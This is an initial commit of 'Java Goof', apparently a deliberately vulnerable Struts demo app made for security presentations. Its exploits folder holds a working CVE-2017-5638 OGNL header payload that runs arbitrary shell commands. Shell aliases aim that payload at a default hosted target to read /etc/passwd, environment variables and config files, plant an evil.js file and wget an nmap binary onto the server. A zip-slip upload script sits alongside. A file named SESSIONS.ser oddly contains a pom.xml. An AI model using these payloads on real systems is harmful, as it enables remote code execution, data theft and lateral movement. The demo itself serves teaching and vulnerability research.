initial commit

Author: snyk-matt

.gitignore

@@ -0,0 +1,3 @@
+*.iml
+.idea
+*/target/**

Dockerfile

@@ -0,0 +1,12 @@
+FROM maven:3-jdk-8-slim
+
+RUN mkdir /usr/src/goof
+RUN mkdir /tmp/extracted_files
+COPY . /usr/src/goof
+WORKDIR /usr/src/goof
+
+RUN mvn install
+
+EXPOSE 8080
+ENTRYPOINT ["mvn", "tomcat7:run"]
+

Procfile

@@ -0,0 +1 @@
+web: mvn -f todolist-web-struts tomcat7:run

README.md

@@ -0,0 +1,30 @@
+## Java Goof
+
+A vulnerable demo application, initially based on [Ben Hassine](https://github.com/benas/)'s [TodoMVC](https://github.com/benas/todolist-mvc). 
+
+The goal of this application is to demonstrate through example how to find, exploit and fix vulnerable Maven packages. 
+
+This repo is still incomplete, a work in progress to support related presentations.
+
+
+## Build and run Todolist MVC
+
+(from the original README)
+
+*Note that to run locally, you need JDK 8.*
+
+1.  Check out the project source code from github : `git clone https://github.com/snyk/java-goof.git`
+2.  Open a terminal and run the following command from root directory : `mvn install`
+3.  Choose a web framework to test and run it. For example : `cd todolist-web-struts && mvn tomcat7:run` (note: this example currently only copied the Struts demo)
+4.  Browse the following URL : `localhost:8080/`
+5.  You can register a new account or login using the following credentials : [email protected] / foobar
+
+## Running with docker-compose
+```bash
+docker-compose up --build
+docker-compose down
+```
+
+## License
+This repo is available released under the [MIT License](http://opensource.org/licenses/mit-license.php/).
+# java-goof

docker-compose.yml

@@ -0,0 +1,9 @@
+version: "2"
+services:
+  javagoof:
+    build: .
+    container_name: javagoof
+    environment:
+      - DOCKER=1
+    ports:
+      - "8080:8080"

exploits/http-vuln-struts-detection.nse

@@ -0,0 +1,77 @@
+description = [[
+Detects whether the specified URL is vulnerable to the Apache Struts
+Remote Code Execution Vulnerability (CVE-2017-5638).
+]]
+
+local http = require "http"
+local shortport = require "shortport"
+local vulns = require "vulns"
+local stdnse = require "stdnse"
+local string = require "string"
+
+---
+-- @usage
+-- nmap -p <port> --script http-vuln-cve2017-5638 <target>
+--
+-- @output
+-- PORT    STATE SERVICE
+-- 80/tcp  open  http
+-- | http-vuln-cve2017-5638:
+-- |   VULNERABLE
+-- |   Apache Struts Remote Code Execution Vulnerability
+-- |     State: VULNERABLE
+-- |     IDs:  CVE:CVE-2017-5638
+-- |
+-- |     Disclosure date: 2017-03-07
+-- |     References:
+-- |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638
+-- |       https://cwiki.apache.org/confluence/display/WW/S2-045
+-- |_      http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html
+--
+-- @args http-vuln-cve2017-5638.method The HTTP method for the request. The default method is "GET".
+-- @args http-vuln-cve2017-5638.path The URL path to request. The default path is "/".
+
+author = "Seth Jackson"
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = { "vuln" }
+
+portrule = shortport.http
+
+action = function(host, port)
+  local vuln = {
+    title = "Apache Struts Remote Code Execution Vulnerability",
+    state = vulns.STATE.NOT_VULN,
+    description = [[
+Apache Struts 2.3.5 - Struts 2.3.31 and Apache Struts 2.5 - Struts 2.5.10 are vulnerable to a Remote Code Execution
+vulnerability via the Content-Type header.
+    ]],
+    IDS = {
+        CVE = "CVE-2017-5638"
+    },
+    references = {
+        'https://cwiki.apache.org/confluence/display/WW/S2-045',
+        'http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html'
+    },
+    dates = {
+        disclosure = { year = '2017', month = '03', day = '07' }
+    }
+  }
+
+  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+
+  local method = stdnse.get_script_args(SCRIPT_NAME..".method") or "GET"
+  local path = stdnse.get_script_args(SCRIPT_NAME..".path") or "/"
+  local value = stdnse.generate_random_string(8)
+
+  local header = {
+    ["Content-Type"] = string.format("%%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Check-Struts', '%s')}.multipart/form-data", value)
+  }
+
+  local response = http.generic_request(host, port, method, path, { header = header })
+
+  if response and response.status == 200 and response.header["x-check-struts"] == value then
+    vuln.state = vulns.STATE.VULN
+  end
+
+  return vuln_report:make_output(vuln)
+end

exploits/loc-stats.txt

@@ -0,0 +1,4 @@
+408 lines of app src code (no deps)
+23 dependencies (libraries) in use
+690,944 lines of dependency code
+691,352 total

exploits/struts-aliases.sh

@@ -0,0 +1,35 @@
+if [ -z "$JAVA_GOOF_HOST" ]; then
+	export JAVA_GOOF_HOST=java-goof.herokuapp.com
+	export JAVA_GOOF_URL=https://$JAVA_GOOF_HOST
+fi
+export JAVA_GOOF_DEBUG=-v
+
+alias struts_base_command="echo \$EXP_MESSAGE'\n\n' &| cat struts-exploit-headers.txt| sed 's/COMMAND/'\$EXP_COMMAND'/' | xargs curl --http1.0 \$JAVA_GOOF_DEBUG $JAVA_GOOF_URL -H"
+
+# Check if struts is there
+alias struts0="nmap  -p 80 --script http-vuln-struts-detection.nse $JAVA_GOOF_HOST"
+
+# List files (simple)
+alias struts1="export EXP_MESSAGE='Getting list of files...'; export EXP_COMMAND='ls -l'; struts_base_command"
+
+# Get env
+alias struts2="export EXP_MESSAGE='Getting environment info...'; export EXP_COMMAND='env'; struts_base_command"
+
+# Get passwd
+alias struts3="export EXP_MESSAGE='Getting password hash file...'; export EXP_COMMAND='cat \/etc\/passwd'; struts_base_command"
+
+# List files - deep
+alias struts4="export EXP_MESSAGE='Getting full list of files...'; export EXP_COMMAND='find .'; struts_base_command"
+
+# Show a sensitive file
+alias struts5="export EXP_MESSAGE='Showing sensitive properties file...'; export EXP_COMMAND='cat .\/target\/tomcat.*\/webapps\/expanded\/WEB-INF\/classes\/struts.properties'; struts_base_command"
+
+# Create a file *********(make sure JAVA_GOOF_TOMCAT_PID is set to the right PID)******
+alias struts6="export EXP_MESSAGE='Create a file at $JAVA_GOOF_URL/static/js/evil.js...'; export export EXP_COMMAND='echo MUHAHAHAHAHAHAHA > .\/target\/tomcat.'\$JAVA_GOOF_TOMCAT_PID'\/webapps\/expanded\/static\/js\/evil.js'; struts_base_command"
+
+# Getting IP Info
+alias struts7="export EXP_MESSAGE='Gathering internal network information...'; export export EXP_COMMAND='ip addr show'; struts_base_command"
+
+# Uploading nmap to do port scanning
+alias struts8="export EXP_MESSAGE='Uploading nmap...'; export export EXP_COMMAND='wget https:\/\/github.com\/andrew-d\/static-binaries\/raw\/master\/binaries\/linux\/x86_64\/nmap'; struts_base_command"
+

exploits/struts-exploit-headers.txt

@@ -0,0 +1 @@
+"Content-type: %{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='COMMAND').(#cmds={'/bin/bash','-c',#cmd}).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

exploits/struts-exploit.sh

@@ -0,0 +1,4 @@
+# Struts exploit using curl and httpie (more colourful HTTP client)
+# (runs 'env' or 'cat /etc/passwd', can replace env with any other command (note to escape slashes and double quotes)
+cat struts-exploit-headers.txt| sed "s/COMMAND/env/" | xargs curl -v -X GET http://localhost:8080 -H
+cat struts-exploit-headers.txt| sed "s/COMMAND/cat \/etc\/passwd/" | xargs http -v http://localhost:8080

exploits/zip-slip.py

@@ -0,0 +1,13 @@
+#! /usr/bin/env python
+
+# to run: `python zip-slip.py http://SERVER-IP:SERVER-PORT`
+
+import requests
+import os
+import sys
+
+malicious_zip = os.path.join(os.path.dirname(__file__), 'zip-slip.zip')
+url = (sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080') + '/todo/upload.do.action'
+files = {'upload': ('zip-slip.zip', open(malicious_zip, 'rb'), 'application/zip')}
+
+requests.post(url, files=files)

out/production/localhost/SESSIONS.ser

@@ -0,0 +1,83 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+
+    <groupId>io.github.snyk</groupId>
+    <artifactId>todolist-mvc</artifactId>
+    <version>1.0-SNAPSHOT</version>
+    <name>Todolist MVC parent module</name>
+    <description>A vulnerable demo application, initially based on Ben Hassine's TodoMVC.</description>
+    <url>https://github.com/snyk/java-goof</url>
+
+    <properties>
+        <spring.version>3.2.6.RELEASE</spring.version>
+        <hibernate.version>4.3.7.Final</hibernate.version>
+        <tapestry.version>5.3.8</tapestry.version>
+        <struts2.version>2.3.20</struts2.version>
+        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+    </properties>
+
+    <modules>
+        <module>todolist-core</module>
+        <module>todolist-web-common</module>
+        <module>todolist-web-struts</module>
+    </modules>
+    <packaging>pom</packaging>
+
+    <licenses>
+        <license>
+            <name>MIT License</name>
+            <url>http://opensource.org/licenses/mit-license.php</url>
+        </license>
+    </licenses>
+
+    <build>
+        <pluginManagement>
+            <plugins>
+                <plugin>
+                    <groupId>org.apache.maven.plugins</groupId>
+                    <artifactId>maven-compiler-plugin</artifactId>
+                    <version>3.2</version>
+                    <configuration>
+                        <verbose>true</verbose>
+                        <source>1.7</source>
+                        <target>1.7</target>
+                        <showWarnings>true</showWarnings>
+                    </configuration>
+                </plugin>
+                <plugin>
+                    <groupId>org.apache.maven.plugins</groupId>
+                    <artifactId>maven-dependency-plugin</artifactId>
+                    <version>2.9</version>
+                    <executions>
+                        <execution>
+                            <id>install</id>
+                            <phase>install</phase>
+                            <goals>
+                                <goal>sources</goal>
+                            </goals>
+                        </execution>
+                    </executions>
+                </plugin>
+                <plugin>
+                    <groupId>org.apache.maven.plugins</groupId>
+                    <artifactId>maven-war-plugin</artifactId>
+                    <version>2.4</version>
+                    <configuration>
+                        <warName>todolist</warName>
+                    </configuration>
+                </plugin>
+                <plugin>
+                    <groupId>org.apache.tomcat.maven</groupId>
+                    <artifactId>tomcat7-maven-plugin</artifactId>
+                    <version>2.2</version>
+                    <configuration>
+                        <warFile>target/todolist.war</warFile>
+                        <path>/</path>
+                    </configuration>
+                </plugin>
+            </plugins>
+        </pluginManagement>
+    </build>
+
+</project>